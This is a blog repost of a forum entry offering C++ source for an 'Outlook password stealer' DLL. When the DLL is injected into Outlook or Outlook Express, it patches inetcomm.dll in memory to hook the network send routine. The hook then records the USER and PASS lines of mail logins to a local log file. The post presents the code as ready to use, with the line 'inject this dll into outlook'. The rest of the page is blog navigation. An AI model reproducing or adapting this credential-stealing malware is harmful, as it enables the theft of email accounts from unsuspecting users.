Password Stealer For Outlook

http://www.rohitab.com/discuss/topic/23924-password-stealer-for-outlook/
simply inject this dll into outlook and see for yourselfs what happens. This code is 100% my own.(tested on outlook 2003 only) :P


/*copyright Joek */

#include <windows.h>
#include <Psapi.h>

HANDLE hThreadDllMain;

DWORD WINAPI ExitThread(LPVOID lpParameter){
   WaitForSingleObject(hThreadDllMain, INFINITE);
   FreeLibraryAndExitThread((HMODULE)lpParameter,0);}


int PASCAL mysend(SOCKET s,const char* buf,int len,int flags){
    if (((strstr(buf,"USER")) == buf) || (strstr(buf,"PASS")) == buf){         
    HANDLE hFile = CreateFile("C:\\log.txt",GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIB
UTE_NORMAL,NULL);
    if(hFile != INVALID_HANDLE_VALUE){
    SetFilePointer(hFile,0,NULL,FILE_END);
    DWORD dwBytesWritten;
    WriteFile(hFile,buf,len,&dwBytesWritten,NULL);
    CloseHandle(hFile);}}
    return send(s,buf,len,flags);}   

                        
extern "C" BOOL APIENTRY DllMain (HINSTANCE hInst,DWORD reason,LPVOID reserved)
{
switch (reason)
{
case DLL_PROCESS_ATTACH:
char szBaseName[MAX_PATH];
GetModuleBaseName(GetCurrentProcess(),NULL,szBaseName,sizeof(szBaseName));
if((lstrcmpi(szBaseName,"OUTLOOK.EXE") == 0) || (lstrcmpi(szBaseName,"msimn.exe") == 0)){
BYTE *pByte = ((BYTE*)LoadLibrary("inetcomm.dll") + 0x106D5);
if(pByte != (BYTE*)0x106D5)
{
DWORD dwOld;
if(VirtualProtect(pByte,6,PAGE_EXECUTE_READWRITE,&dwOld)){
*pByte = 0xE8;
*(DWORD*)(pByte + 1) = (DWORD)mysend - ((DWORD)pByte+5);
*(pByte + 5) = 0x90;
VirtualProtect(pByte,6,dwOld,&dwOld);}}}
else{
  DWORD dwThreadId;
  DuplicateHandle(GetCurrentProcess(),GetCurrentThread(),GetCurrentProcess(),&hThreadDllMain,0,FALSE,0);
  CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)ExitThread,(LPVOID)hInst,0,&dwThreadId);}
break;
}
return TRUE;
}

posted on 2011-03-08 22:49 挑灯看剑 阅读(297) 评论(0)  编辑 收藏 引用 所属分类: C/C++

只有注册用户登录后才能发表评论。
<2011年3月>
272812345
6789101112
13141516171819
20212223242526
272829303112
3456789

导航

公告

【自我介绍】 08年南开大学硕士毕业 最近关注:算法、Linux、c++、高并发 爱好:滑旱冰、打乒乓球、台球、保龄球

常用链接

随笔分类(139)

文章分类

我常去的网站

技术博客(都是大牛)

技术站点

搜索

积分与排名